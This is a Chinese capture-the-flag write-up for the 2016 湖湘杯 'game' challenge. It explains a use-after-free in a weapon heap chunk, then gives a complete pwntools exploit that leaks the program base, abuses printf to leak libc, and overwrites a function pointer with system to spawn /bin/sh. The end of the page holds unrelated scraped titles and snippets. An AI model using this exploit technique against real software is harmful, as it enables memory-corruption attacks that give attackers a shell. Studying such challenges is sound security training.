0x00 分析程序

根据分析,我们可以得到以下重要数据结构

0x01 发现漏洞

1.在武器使用次数耗光后,程序会把存储该武器的堆块free,在free的时候没有清空指针,造成悬挂指针

2.comment存储在一个大小和武器块一样的堆块中,我们武器释放后再执行commit函数,那么武器堆块和comment堆块是同一块堆块

0x02 漏洞利用

1.在comment函数中向堆块中写入16字节的ascii码,再利用show_weapon函数把武器数据结构中的attack函数地址泄露出来,由此可以计算得到程序基址

2.利用程序基址计算出printf地址,再将printf函数写到attack函数处,再调用attack函数(相当于调用printf函数)把memset函数地址打印出来,由此可以计算出libc基址

3.得到了libc基址,就可以根据libc.so库算出system_addr,再利用comment将system函数写到attack函数处,在堆块中写入‘/bin/sh’,调用attack函数便可得到shell.

0x03 exp

from pwn import *

t = process('./game')

libc = ELF('./libc.so')

context.log_level = "debug"

def warehouse(count):

    t.recvuntil('$')

    t.sendline('build_warehouse')

    t.recvuntil('want have?\n')

    t.sendline(str(count))

def buy(name, tid):

    t.recvuntil('$')

    t.sendline('buy_weapon')

    t.recvuntil('buy?\n')

    t.sendline(name)

    t.recvuntil('weapon?\n')

    t.sendline(str(tid))

def show(tid):

    t.recvuntil('$')

    t.sendline('show_weapon')

    t.recvuntil('warehouse\n')

    t.sendline(str(tid))

def attack(tid):

    t.recvuntil('$')

    t.sendline('attack_boss')

    t.recvuntil('warehouse\n')

    t.sendline(str(tid))

def comment(co_buff):

    t.recvuntil('$')

    t.sendline('comment')

    t.recvuntil('?\n')

    t.send(co_buff)

def leak_addr(addr,printf_plt):

    co_buff = ''

    co_buff += '%%%d$s.' % (7)

    co_buff = co_buff.ljust(16, '\x00')

    co_buff += p32(printf_plt)

    co_buff += '\n'

    comment(co_buff)

    show(0)

    t.sendline('attack_boss')

    t.recvuntil('warehouse\n')

    payload = ''

    payload += ''* 0x04

    payload += p32(addr)

    t.sendline(payload)

    data = t.recv(4)

    back_addr = u32(data[:4])

    return back_addr

def main():

    t.recvuntil('name?\n')

    t.sendline('xt')

    warehouse(3)

    buy('UMP45', 0)

    attack(0)

    attack(0)

    attack(0)

    show(0)

    co_buff = ''

    co_buff += 'd' * 0x16 + '\n'

    comment(co_buff)

    show(0)

    t.recvuntil('Weapon name: ')

    t.recv(16)

    data = t.recvuntil('price:')[:-7]

    addr = u32(data[:4].ljust(4, '\x00'))

    proc_addr = addr - 0x1287

    success('proc_addr:' + hex(proc_addr))

    memset_got = 0x00002154 + proc_addr

    printf_plt = 0x00000710 + proc_addr

    memset_addr = leak_addr(memset_got,printf_plt)

    offset_memset = libc.symbols['memset']

    offset_system = libc.symbols['system']

    libc_base = memset_addr - offset_memset

    system_addr = libc_base + offset_system

    success('libc_base:' + hex(libc_base))

    success('system_addr:' + hex(system_addr))

    co_buff = ""

    co_buff += "/bin/sh;"

    co_buff = co_buff.ljust(16, '\x00')

    co_buff += p32(system_addr)

    co_buff += "\n"

    comment(co_buff)

    t.sendline("attack_boss")

    t.recvuntil("warehouse\n")

    payload = ""

    payload += ""

    t.sendline(payload)

    t.interactive()

if __name__ == '__main__':

    main()

uaf-湖湘杯2016game_学习的更多相关文章

  1. CTF 湖湘杯 2018 WriteUp (部分)

    湖湘杯 2018 WriteUp (部分),欢迎转载,转载请注明出处! 1.  CodeCheck(WEB) 测试admin ‘ or ‘1’=’1’# ,php报错.点击登录框下面的滚动通知,URL ...

  2. 2017湖湘杯复赛writeup

    2017湖湘杯复赛writeup 队伍名:China H.L.B 队伍同时在打 X-NUCA  和 湖湘杯的比赛,再加上周末周末周末啊,陪女朋友逛街吃饭看电影啊.所以精力有点分散,做出来部分题目,现在 ...

  3. 2019 湖湘杯 Reverse WP

    0x01 arguement 下载链接:https://www.lanzous.com/i7atyhc 1.准备 获取到信息: 32位的文件 upx加密文件 在控制台打开文件 使用"upx ...

  4. 【CTF】2019湖湘杯 miscmisc writeup

    题目来源:2019湖湘杯 题目链接:https://adworld.xctf.org.cn/task/answer?type=misc&number=1&grade=1&id= ...

  5. 2017湖湘杯Writeup

    RE部分 0x01 Re4newer 解题思路: Step1:die打开,发现有upx壳. Step2:脱壳,执行upx -d 文件名即可. Step3:IDA打开,shift+F12看字符串. 点进 ...

  6. Bugku Writeup —文件上传2(湖湘杯)

    我们先来看下题目,题目说明是文件上传 我们可以尝试通过构造payload来进行测试 php://filter/read=convert.base64-encode/resource=flag 获取到f ...

  7. 2018湖湘杯web、misc记录

    1.题目名 Code Check 打开题目,右键发现有id参数的url,简单base64解码以后发现不是明文,说明利用了其他的加密方式,那么应该会有具体的加密方式给我们,于是试试常见的文件泄露,可以发 ...

  8. 湖湘杯2020_ReMe

    查壳后发现是由Python2.7环境下编译得到的exe可执行文件 由此想到可将exe转为pyc文件再反编译成py文件 且该方法只适用于py2 无混淆 因为py3的字节码结构有些许变化 step1: 在 ...

  9. 湖湘杯2020 writeup

    这个平台中间卡的离谱,卡完过后交了flag分还掉了 Web 题目名字不重要 也算是非预期吧,赛后y1ng师傅也说了因为要多端口环境必须这样配,预期解很难 NewWebsite 后台弱口令admin a ...

随机推荐

  1. Ogre 整体框架入门

    ogre 是面向对象的3d图形引擎. root 是引擎的一个界面类,包含很多快捷的调用其他类的接口. 在ogre中,广泛的使用了单件模式,同时最大的保证了你不需要自己管理资源,除了是你自己new的对象 ...

  2. Node.js 使用Stream的pipe(管道)方法实现文件复制

    Stream模块有一个pipe方法,可以将两个流串起来,实现所有的数据自动从Readable流进入Writable流 "use strict"; const fs = requir ...

  3. apringboot aop权限控制

    + 定义切面: ···@Aspect @Component public class LoginInterceptor { @Around("@annotation(lock)") ...

  4. ASP.NET Core MVC内置服务的使用

    ASP.NET Core中的依赖注入可以说是无处不在,其通过创建一个ServiceCollection对象并将服务注册信息以ServiceDescriptor对象的形式添加在其中,其次针对Servic ...

  5. spark sql 的metastore 对接 postgresql

    本教程记录 spark 1.3.1 版本的thriftserver 的metastore 对接 postgresql postgresql 的编译,参考:http://www.cnblogs.com/ ...

  6. vs2013缺少Mvc 怎么办?

    命名空间System.Web中不存在类型或命名空间名称Mvc是否缺少程序集引用? 以前vs2010或2012以前的引用一下就有了,为何现在vs2013没有,该这么处理呢?? 解决方案: 打开PCM:  ...

  7. Elasticsearch之安装

    elasticsearch需要java8以上支持 java -version 二进制文件下载 www.elastic.co/downloads tar安装示例 1.下载tar文件 curl -L -O ...

  8. Windows下打开某些软件时显示显卡驱动不是最新的问题

    在Windows下打开某些对显卡要求比较高的软件时,会出现某些显卡驱动不是最新,要求更新到最新的提示,但是当你真的去更新显卡驱动的时候,却发现现在的显卡驱动已经是最新了,那么为什么还会有这样的提示呢, ...

  9. Railroad UVALive - 4888 记忆化搜索

    https://icpcarchive.ecs.baylor.edu/index.php?option=com_onlinejudge&Itemid=8&page=show_probl ...

  10. 牛客网Java刷题知识点之Java为什么不能支持多继承,但可以用接口来间接实现多继承

    不多说,直接上干货! java只支持单继承,这是由于安全性的考虑,如果子类继承的多个父类里面有相同的方法或者属性,子类将不知道具体要继承哪个,而接口可以多实现,是因为接口只定义方法,而没有具体的逻辑实 ...